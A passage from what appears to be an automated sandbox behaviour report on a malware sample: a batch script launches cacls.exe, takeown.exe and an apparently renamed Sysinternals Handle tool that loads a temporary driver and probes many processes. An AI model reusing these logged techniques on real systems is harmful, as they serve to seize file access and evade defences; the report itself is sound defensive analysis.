| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 82 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 18 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 200, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xea8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xb48, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0xbd4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Genko_1.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
3 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Genko_1.jtp" |
|
1 |
Process #26: vidhs3md64.exe
534
0
| Information | Value |
|---|---|
| ID | #26 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\vidhs3md64.exe |
| Command Line | vIDhS3md.exe -accepteula "alfred.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:39, Reason: Child Process |
| Unmonitor | End Time: 00:04:31, Reason: Self Terminated |
| Monitor Duration | 00:00:52 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa54 |
| Parent PID | 0xe34 (c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B2C
0x
EA4
0x
E50
0x
F10
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00180000 | 0x0023dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00256fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x00260fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00270fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x004dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x00667fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x007f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x01bfffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c00000 | 0x01c00000 | 0x01cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d00000 | 0x01d00000 | 0x01e10fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fea3000 | 0x7fea3000 | 0x7fea3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| vidhs3md64.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffff4000 | 0x7ff5ffff4000 | 0x7ff5ffff4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffff9000 | 0x7ff5ffff9000 | 0x7ff5ffffafff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffb000 | 0x7ff5ffffb000 | 0x7ff5ffffcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffd000 | 0x7ff5ffffd000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| comctl32.dll | 0x7ffadf0a0000 | 0x7ffadf149fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffaeb6f0000 | 0x7ffaeb6f9fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7ffaf2b90000 | 0x7ffaf2c07fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffaf4590000 | 0x7ffaf4bb7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffaf4bc0000 | 0x7ffaf4c72fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffaf53c0000 | 0x7ffaf53f5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffaf5990000 | 0x7ffaf6eb4fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffaf6f70000 | 0x7ffaf70cbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffaf7860000 | 0x7ffaf78b0fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ffaf7930000 | 0x7ffaf7a07fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \\.\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \\.\Global\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Windows\system32\Drivers\PROCEXP152.SYS | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \\.\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Windows\system32\Drivers\PROCEXP152.SYS | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Windows\system32\Drivers\PROCEXP152.SYS | size = 32768 |
|
1 | |
| Write | C:\Windows\system32\Drivers\PROCEXP152.SYS | size = 1560 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 29 |
|
1 | |
| Delete | C:\Windows\system32\Drivers\PROCEXP152.SYS | - |
|
1 |
Registry (13)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = Type, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = ErrorControl, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = Start, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = ImagePath, data = \??\C:\Windows\system32\Drivers\PROCEXP152.SYS, size = 92, type = REG_SZ |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152\Enum | - |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152\Security | - |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | - |
|
1 |
Process (101)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\syswow64\cmd.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_DUP_HANDLE |
|
6 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_DUP_HANDLE |
|
6 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\wbem\wmiadap.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\wbem\wmiadap.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | System | desired_access = PROCESS_DUP_HANDLE |
|
5 | |
| Open | System | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\reference assemblies\nigeria reached hindu.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\style-percent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\italian.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\november.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows media player\photoshop_hormone_protein.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\expenditurevincenttablet.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows nt\deaths.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\alfred.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\reference assemblies\admit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows nt\set.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows portable devices\regulations_consensus_score.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\upgrading.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\syria promptly.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows multimedia platform\tones engaging.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\restaurant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\th-italia.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\nwypdmno.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\wscript.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiadap.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 |
Module (72)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ffaf70d0000 |
|
2 | |
| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x7ffaf7a10000 |
|
17 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\vidhs3md64.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ffaf70f02a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ffaf70f23f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ffaf70e63c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ffaf70ed920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ffaf70f5620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ffaf70f5580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ffaf70f55e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ffaf70f0e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ffaf70ef110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ffaf7a4cb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ffaf7a55790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ffaf7a4ea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ffaf70f28c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ffaf7a4c470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ffaf7a55410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ffaf7aa42f0 |
|
1 | |
